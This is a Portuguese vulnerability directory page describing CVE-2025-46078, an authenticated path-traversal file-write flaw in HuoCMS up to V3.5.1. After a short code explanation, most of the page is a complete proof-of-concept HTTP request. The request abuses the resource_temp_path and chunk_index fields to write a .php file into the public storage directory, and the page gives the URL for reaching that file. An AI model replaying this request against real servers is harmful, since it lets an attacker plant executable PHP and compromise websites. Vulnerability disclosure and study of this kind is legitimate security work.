Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-46078 — Descrição da Vulnerabilidade | Kitploit
Ferramentas/GitHubGitHub/yggcwhat/cve-2025-46078
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoConfiguração Incorreta
GitHubyggcwhat/cve-2025-46078

CVE-2025-46078

Descrição da Vulnerabilidade

Ver Repositório
4há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Autor do bug:

yggcwhat

Versão afetada:

Huocms

Fornecedor:

https://huocms.com/

Endereço do código-fonte:

https://gitee.com/digital-flag/huocms

Arquivo de vulnerabilidade:

Upload.php

Versão afetada:

HuoCMS - <=V3.5.1

Descrição:

No método sliceUploadAndSave de AttachmentController.php (localizado em app -> controller -> backend), o parâmetro resource_type é validado contra uma lista de permissões de extensões de arquivo permitidas (ex.: txt, png, etc.). Em seguida, o método invoca tmpMove de Upload.php (em app -> service -> upload).

O método tmpMove primeiro cria um arquivo. No entanto, o parâmetro $filename (controlado pelo parâmetro de entrada resource_temp_path, que é controlável pelo usuário) pode ser explorado para percorrer diretórios (ex.: usando ../) e criar pastas. O método então realiza uma operação de movimentação, colocando o arquivo no diretório criado. O nome final do arquivo é gerado anexando um sublinhado e o sufixo $pos, onde $pos é controlado pelo parâmetro chunk_index passado durante a chamada (consulte a passagem real de parâmetros para detalhes).

Baixar ferramenta

Isso cria uma vulnerabilidade onde um atacante pode manipular resource_temp_path e chunk_index para gravar arquivos em locais arbitrários com nomes de arquivo controlados.

Detalhes: app >controller >backend > AttachmentController.php: sliceUploadAndSave image

app >service >upload > Upload.php: tmpMove image image

Essa vulnerabilidade é um problema de backend que exige login no backend com um token para ser invocada. Configure e faça login por conta própria.

POC:

root@kitploit:~
POST /attachment/sliceUploadAndSave HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: token
Content-Type: multipart/form-data; boundary=----geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Length: 990
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

------geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Disposition: form-data; name="resource_chunk"; filename="blob"
Content-Type: application/octet-stream

1
------geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Disposition: form-data; name="chunk_total"

1
------geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Disposition: form-data; name="chunk_index"

.php
------geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Disposition: form-data; name="resource_temp_basename"

.php
------geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Disposition: form-data; name="resource_temp_path"

../../../public/storage/image/20250415/
------geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Disposition: form-data; name="resource_type"

txt
------geckoformboundary13d3934e0299a09e8748d146bfb9d483
Content-Disposition: form-data; name="resource_name"

11.png
------geckoformboundary13d3934e0299a09e8748d146bfb9d483--

image

URL de acesso: http://127.0.0.1/storage/image/20250415/%5f%5f.php image

Referência:

http://huocms.com https://github.com/yggcwhat/CVE-2025-46078/edit/main/README.md https://www.huocms.com/